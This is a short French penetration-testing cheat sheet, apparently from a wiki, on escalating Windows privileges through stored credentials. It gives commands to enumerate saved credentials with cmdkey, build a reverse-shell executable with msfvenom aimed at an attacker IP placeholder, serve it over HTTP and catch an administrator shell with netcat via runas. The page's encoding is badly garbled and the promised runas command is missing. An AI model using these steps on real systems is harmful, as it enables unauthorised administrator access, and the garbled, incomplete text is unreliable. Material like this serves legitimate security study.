๐Stored Credentials
Microsoft Windows offre une large gamme d'autorisations et de privilรจges prรฉcis pour contrรดler l'accรจs aux composants Windows, notamment les services, les fichiers et les entrรฉes de registre. L'exploitation des informations d' identification stockรฉes est une technique pour augmenter les privilรจges.
Exploitation
Si un attaquant identifie une entrรฉe d'informations d'identification stockรฉe pour un compte administrateur, il peut opter pour une รฉlรฉvation de privilรจges en exรฉcutant un fichier malveillant ร l'aide de l'utilitaire runas.
Pour รฉnumรฉrer une liste de tous les noms d'utilisateur et informations d'identification stockรฉs, tapez :
>cmdkey /list
Imaginons qu'on trouve ceci:
Crรฉer un exรฉcutable malveillant:
$ msfvenom โp windows/shell_reverse_tcp lhost= <attacker IP> lport= <port d'รฉcoute> โf exe > shel.exe
Puis le mettre dans un serveur http:
$ python โm SimpleHTTPServer 80
Dรฉmarrez un netcat dans un nouveau terminal et transfรฉrez le shell.exe et exรฉcutez-le ร l'aide de la commande suivante.
Si tout se passe bien, nous devrions avoir reรงu la session de l'administrateur sur le netcat prรฉcรฉdemment lancรฉ.
Derniรจre mise ร jour